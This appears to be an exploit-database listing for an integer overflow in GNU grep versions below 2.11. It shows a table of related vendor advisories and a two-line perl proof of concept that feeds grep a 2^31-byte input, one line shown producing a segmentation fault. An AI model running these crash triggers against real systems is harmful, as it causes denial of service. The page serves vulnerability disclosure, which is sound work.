Grep <2.11 INT overflow, DoS, CMD Execution

🗓️ 30 Dec 2012 00:00:00Reported by MegaManSecType

zdt🔗 0day.today👁 34 Views

Grep <2.11 INT overflow vulnerability not patched in Ubuntu, Redha

Reporter	Title	Published	Views	Family All 45
0day.today	Grep < 2.11 Integer Overflow Crash PoC	31 Dec 201200:00	–	zdt
IBM Security Bulletins	IBM Security Network Protection / IBM QRadar Network Security / XGS Technote Index	31 Jan 202100:10	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerabilities in GNU grep utility affect IBM Security Network Protection (CVE-2012-5667, and CVE-2015-1345)	16 Jun 201821:38	–	ibm
IBM Security Bulletins	Security Bulletin: Multiple vulnerabilities in GNU grep affect IBM SmartCloud Provisioning for IBM Software Virtual Appliance (CVE-2015-1345, CVE-2012-5667)	17 Jun 201822:32	–	ibm
IBM Security Bulletins	Security Bulletin: Grep vulnerabilities affect IBM SmartCloud Entry (CVE-2012-5667)	19 Jul 202000:49	–	ibm
Amazon	Low: grep	22 Sep 201500:00	–	amazon
Tenable Nessus	Amazon Linux AMI : grep (ALAS-2015-598)	23 Sep 201500:00	–	nessus
Tenable Nessus	CentOS 6 : grep (CESA-2015:1447)	28 Jul 201500:00	–	nessus
Tenable Nessus	F5 Networks BIG-IP : Grep vulnerability (K69662152)	29 Jun 201700:00	–	nessus
Tenable Nessus	GLSA-201403-07 : grep: User-assisted execution of arbitrary code	27 Mar 201400:00	–	nessus

#There are many ways of doing this.

#Method one:
$ perl -e 'print "x"x(2**31)' | grep x > /dev/null
Segmentation fault (core dumped)


#Method two:
$ perl -e 'print "\nx"x(2**31)' | grep -c x > /dev/null


Twitter: https://twitter.com/MegaManSec

#  0day.today [2018-04-03]  #

30 Dec 2012 00:00Current

9.3High risk

Vulners AI Score9.3

EPSS0.02243